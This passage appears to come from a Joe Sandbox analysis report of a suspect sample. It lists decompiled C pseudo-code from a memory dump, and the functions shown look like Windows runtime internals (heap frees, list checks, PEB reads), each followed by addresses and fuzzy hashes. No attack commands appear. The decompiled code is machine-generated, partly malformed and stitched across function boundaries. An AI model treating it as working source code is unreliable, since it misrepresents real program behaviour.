						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}

0x017590af
0x017590b8
0x017590bb
0x017590bf
0x017590c2
0x017590c2
0x017590c8
0x017590cb
0x017590cd
0x017914d7
0x017914eb
0x017914eb
0x00000000
0x017914eb
0x017914db
0x017914e6
0x00000000
0x017914f2
0x017914e8
0x00000000
0x017914e8
0x017590d8
0x017590da
0x017590dd
0x017590e5
0x00000000
0x01759139
0x017590fa
0x017590fe
0x01759142
0x00000000
0x01759142
0x01759104
0x01759107
0x0175910b
0x01759110
0x01759118
0x01759147
0x01759148
0x0175914f
0x01759150
0x01759151
0x01759152
0x01759156
0x0175915d
0x01759160
0x01759168
0x0175916c
0x017591bc
0x017591be
0x00000000
0x017591be
0x0175916e
0x01759173
0x01759176
0x00000000
0x00000000
0x0175917c
0x01759180
0x017591b5
0x00000000
0x017591b5
0x01759182
0x01759185
0x01759189
0x00000000
0x00000000
0x0175918e
0x01759190
0x01759198
0x00000000
0x00000000
0x017591a0
0x00000000
0x017591ad
0x017591ad
0x017591b0
0x017591b1
0x00000000
0x01759185
0x0175911a
0x0175911c
0x0175911f
0x01759125
0x01759127
0x00000000

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction ID: 66e0de30b2400b3bdbdb2b4d62e8f13cd8c0bd75c6e3e6d0816c80db469c8136
Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction Fuzzy Hash: 6D219271A00219EFDB21DF59C844EAAFBF8EB54314F1488AEEE49A7211D370ED14CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01743B7A Relevance: .1, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E01743B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x18084c4; // 0x0
				_v12 = 1;
				_v8 =  *0x18084c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L01734620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x18084c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E0175AA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E0175FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x18084c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x18084c4; // 0x0
					L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}

0x01743b89
0x01743b96
0x01743ba1
0x01743bab
0x01743bb5
0x01743bb9
0x01786298
0x01743bbf
0x01743bc2
0x01743bc3
0x01743bc9
0x01743bca
0x01743bcc
0x01743bcd
0x01743bd4
0x01743bd6
0x01743bdb
0x01743bea
0x01743bf7
0x01743bfb
0x01743bff
0x01743c09
0x01743c0a
0x01743c0b
0x01743c0f
0x01743c14
0x01743c18
0x01743c18
0x01743bfb
0x01743c1b
0x01743c30
0x01743c30
0x01743c3d

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 754462f246bb53273792e32cd9358c77a8617db436fbb3c8745624ab53bbd978
Instruction ID: 5ca87c7417fcf68f3c557b294ebbd68671155b4325f76cfee0a6909590646a73
Opcode Fuzzy Hash: 754462f246bb53273792e32cd9358c77a8617db436fbb3c8745624ab53bbd978
Instruction Fuzzy Hash: 3D21BE72A00519EFCB15DF58CD81F5ABBBDFB40308F1500A8EA08AB252D371AE41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0174B390 Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0174B390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E01732280(_t12, 0x1808608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E017500C2(0x1808608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}

0x0174b395
0x0174b3a2
0x0174b3a5
0x0174b3aa
0x0174b3b2
0x0174b3ba
0x0174b3bd
0x0174b3c0
0x0174b3c4
0x0174b3c9
0x0178a3e9
0x0178a3ed
0x0178a3f0
0x0178a3ff
0x0178a403
0x0178a409
0x00000000
0x00000000
0x0178a40b
0x0178a40b
0x0178a40f
0x0178a415
0x0178a423
0x0178a423
0x0178a415
0x0174b3d1
0x0174b3e8
0x0174b3e8
0x0174b3d9

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4aedbf97f779f737c2751a022b791d2a0f142b10ad7f16c547765d7e7b94ff6
Instruction ID: 660073701d490ccd72da395941d0d30c1709e8874b2e5f209357ac0650b27be9
Opcode Fuzzy Hash: d4aedbf97f779f737c2751a022b791d2a0f142b10ad7f16c547765d7e7b94ff6
Instruction Fuzzy Hash: 10116B337051149BCB1A9A198D81A2BF36AEBD5730B250139EE26C7780CA319C02C690

Uniqueness

Uniqueness Score: -1.00%

Function 01719240 Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E01719240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x17ef708);
				E0176D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E017595D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E017595D0();
				_t33 =  *0x18084c4; // 0x0
				L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x18084c4; // 0x0
				L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x18084c4; // 0x0
				E01732280(L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x18086b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E017595D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E017595D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E01719325();
					_t50 =  *0x18084c4; // 0x0
					return E0176D0D1(L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}

0x01719240
0x01719242
0x01719247
0x0171924c
0x0171924e
0x01719255
0x01719257
0x0171925a
0x0171925f
0x0171925f
0x01719266
0x01719271
0x01719276
0x01719279
0x0171927e
0x01719295
0x0171929a
0x017192b1
0x017192b6
0x017192d7
0x017192dc
0x017192e0
0x017192e6
0x017192e8
0x017192ee
0x01719332
0x01719333
0x01719337
0x01719338
0x0171933a
0x0171933a
0x0171933d
0x01719342
0x01719342
0x01719345
0x01719349
0x0171934e
0x01719352
0x01719357
0x017192f4
0x017192f4
0x017192f6
0x017192f9
0x01719300
0x01719306
0x01719324
0x01719324

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8a33109274e40d33f1c9d457cfb6c38043c6e4dfececbcddd3411d4acfc86cd2
Instruction ID: 672b53f870216a18abf02bc185e75a01f8cb5af276eebe8c7ce529f9a8fe5e8a
Opcode Fuzzy Hash: 8a33109274e40d33f1c9d457cfb6c38043c6e4dfececbcddd3411d4acfc86cd2
Instruction Fuzzy Hash: 68218971041A01DFC7A2EF28CA54F19F7F9FF18308F11456CE149866AACB34EA82CB44

Uniqueness

Uniqueness Score: -1.00%

Function 017A4257 Relevance: .1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E017A4257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x17f08d0);
				E0176D08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E017A41E8(__ebx, __edi, __ecx, _t39);
				L0172EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x18087e4;
					_t18 =  *0x18087e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x1805cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x18087e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x18087e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L01717055(_t31 + 0xfffffff8);
								_t24 =  *0x18087e0; // 0x0
								_t18 = _t24 - 1;
								 *0x18087e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x1805cd0;
				if( *0x1805cd0 <= 0) {
					L01717055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x18087e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x18087e8 = _t30;
						 *0x18087e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E0176D0D1(L017A4320());
			}

0x017a4257
0x017a4257
0x017a4257
0x017a4259
0x017a425e
0x017a4263
0x017a4265
0x017a4273
0x017a4278
0x017a427c
0x017a427f
0x017a4281
0x017a4287
0x017a42d7
0x017a42d7
0x017a42da
0x017a428d
0x017a428d
0x017a428f
0x017a4292
0x017a4297
0x017a429c
0x017a42a0
0x017a42a6
0x017a42a8
0x017a42ae
0x017a42b3
0x00000000
0x017a42ba
0x017a42ba
0x017a42bf
0x017a42c5
0x017a42ca
0x017a42cf
0x017a42d0
0x00000000
0x017a42d0
0x017a42b3
0x00000000
0x017a42a6
0x017a429c
0x017a42dc
0x017a42dc
0x017a42e3
0x017a4309
0x017a42e5
0x017a42e5
0x017a42e8
0x017a42ee
0x017a42f0
0x00000000
0x017a42f2
0x017a42f2
0x017a42f4
0x017a42f7
0x017a42f9
0x017a4300
0x017a4300
0x017a42f0
0x017a430e
0x017a431f

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c3f5cf126e3ff09bd07f55c7b9f0aa9f9df8fb442813ee3d9ffae3270113d84
Instruction ID: 6d118d2b07e77f09ac1828103b8da147b0aae42b196ec3bbfd5e990344f7d00f
Opcode Fuzzy Hash: 8c3f5cf126e3ff09bd07f55c7b9f0aa9f9df8fb442813ee3d9ffae3270113d84
Instruction Fuzzy Hash: 63215B71901605CFCB66DF68D004614FBB1FBDA314BA883AEC1068B29DDBB29691CF01

Uniqueness

Uniqueness Score: -1.00%

Function 01742397 Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E01742397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x180848c != 0) {
					L0173FAD0(0x1808610);
					if( *0x180848c == 0) {
						E0173FA00(0x1808610, _t19, _t27, 0x1808610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = L01742581(0x1808610, 0x16f50a0, _t26, _t27, _t28);
						E0173FA00(0x1808610, 0x16f50a0, _t27, 0x1808610);
					}
				} else {
					L1:
					_t11 =  *0x1808614; // 0x0
					if(_t11 == 0) {
						_t11 = E01754886(0x16f1088, 1, 0x1808614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = L01742581(0x1808610, (_t11 << 4) + 0x16f5070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}

0x017423b0
0x017423b6
0x01742409
0x01742415
0x01785ae9
0x00000000
0x0174241b
0x0174241b
0x0174241d
0x01742427
0x0174242e
0x01742430
0x01742430
0x017423b8
0x017423b8
0x017423b8
0x017423bf
0x017423fc
0x017423fc
0x017423c1
0x017423c3
0x017423d0
0x017423d8
0x017423d8
0x017423dc
0x017423de
0x017423e1
0x017423e1
0x017423ec

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb3ba14d24b64387436603abe9276bd21e503bc3adb04973f6d605e5b4a9bab0
Instruction ID: 242b0e71309f3a7454f4daa75e41a67849166efca33a2d0f345285ed2cc7b2a5
Opcode Fuzzy Hash: eb3ba14d24b64387436603abe9276bd21e503bc3adb04973f6d605e5b4a9bab0
Instruction Fuzzy Hash: 46116F31B00301A7E731AA2DFC84B15F698FBA1750F15405AF702D7196CBB0D951C755

Uniqueness

Uniqueness Score: -1.00%

Function 0171C962 Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E0171C962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t19;
				char _t22;
				void* _t26;
				void* _t27;
				char _t32;
				char _t34;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x180d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					L0172EEF0(0x18070a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(L0179F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E0172EB70(_t29, 0x18070a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return L0175B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E0179F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x18070c0; // 0x0
					while(_t38 != 0x18070c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x180b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}

0x0171c96a
0x0171c974
0x0171c988
0x0171c98a
0x01787c9d
0x01787c9f
0x01787ca4
0x01787cae
0x01787cf0
0x01787cf5
0x01787cfa
0x0171c992
0x0171c996
0x0171c997
0x0171c998
0x0171c9a3
0x0171c9a3
0x01787cb0
0x01787cb7
0x01787cbb
0x00000000
0x00000000
0x01787cbd
0x01787ce8
0x01787cc5
0x01787cc8
0x01787cca
0x01787cd0
0x01787cd6
0x01787cde
0x01787ce4
0x01787ce4
0x01787cd0
0x00000000
0x01787ce8
0x0171c990
0x00000000

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d611a3736aec32189d81f369dad32c4702702b15de73898e101d87542028fb9
Instruction ID: 901012a415bfebd36a684ef7c70094a3124ca59365fd77569b80324e1a0a08ef
Opcode Fuzzy Hash: 8d611a3736aec32189d81f369dad32c4702702b15de73898e101d87542028fb9
Instruction Fuzzy Hash: 2811253230060A9BC756EF2DDC85A2BFBE9FB84310B100228E982C3650DF60ED04CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 0174002D Relevance: .1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0174002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E01737D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E01737D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E01737D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E01737D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}

0x01740032
0x01740037
0x01740043
0x01784b3a
0x01740049
0x01740049
0x01740049
0x0174004e
0x01740053
0x01784b48
0x01784b5a
0x01784b4a
0x01784b53
0x01784b53
0x01784b5f
0x00000000
0x01784b61
0x00000000
0x01784b61
0x01740059
0x01740059
0x01740060
0x01784b6f
0x01784b6f
0x01740069
0x01784b83
0x00000000
0x00000000
0x01784b90
0x01784b9b
0x01784b9b
0x01784ba4
0x00000000
0x00000000
0x01784baa
0x00000000
0x0174006f
0x0174006f
0x00000000
0x0174006f
0x01740069

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction ID: 5781f0c0f85bae9c8d4524f2fc4b6815ae05b12f9117b817b82e8ac4c55e023a
Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction Fuzzy Hash: DC11C8726556828FE723A72CD948B75FFD4AF41754F0900E0EE06876A3D768D841C250

Uniqueness

Uniqueness Score: -1.00%

Function 01719080 Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E01719080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x18085ec;
				E01732280(_t48, 0x18085ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return L0172FFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x180538c; // 0x77e46828
					if( *_t84 != 0x1805388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x17ef6e8);
						E0176D0E8(0x18085ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E017E88F5(_t80, _t85, 0x1805388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x18086c0; // 0x14507b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x18086b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E01732280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E017E88F5(0x18085ec, _t85, 0x1805388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												L0175AFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x180b1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x18084c0;
																			if(_t82 >=  *0x18084c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E017E9063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E0171922A(_t99);
										_t64 = E01737D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E017E8B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x18086c0; // 0x14507b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x18086b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x18086bc;
													_t87 = 0x18086b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E01719240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x18086c4;
												_t87 = 0x18086c0;
												L27:
